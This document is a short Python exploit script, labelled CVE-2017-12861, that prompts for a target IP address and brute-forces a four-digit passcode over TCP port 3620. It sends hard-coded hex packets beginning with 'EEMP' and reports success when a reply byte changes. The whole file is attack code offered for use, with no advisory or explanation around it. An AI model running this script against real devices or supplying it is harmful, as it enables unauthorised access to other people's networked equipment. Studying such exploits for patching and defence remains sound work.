CVE-2017-12861/CVE-2017-12861.py

import binascii
import socket

def makepacket(number):

    
    numberstring = str(number)
    while len(numberstring)  < 4:
        numberstring = "0" + numberstring
    
    passcode = binascii.hexlify(numberstring.encode()).decode()
    packet = "45454d5030313030455bc678040000004a00000001000000001c00000000000000ffffff00455bc6640201030005200320200001ff00ff00ff00000810000000010c00000026ab9ffbdf" + passcode + "000000000000000000000000ac15c508"
    #packet = "45454d50303130300a9c1178040000005f00000001010000001c00000000000000ffffe0000a9c00010201030005200320200001ff00ff00ff00000810000000010c0000b0e892ecf8bc" + passcode + "0000000000000000000000000a9c221b1100000011000000000000000e0000000100000007"
    return binascii.unhexlify(packet)

target = input('Enter ip address: ')
port = 3620

client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((target,3620))


for i in range(0,9999):
    print(i)
    client.send(makepacket(i))
    packet = client.recv(4096)
   # packet = packet.encode()
   
    packet= binascii.hexlify(packet)
    packet = packet.decode()

    packet = packet[50]
    if packet != "0":
        print("Success! Keyword is: ",i)
        break


client.close()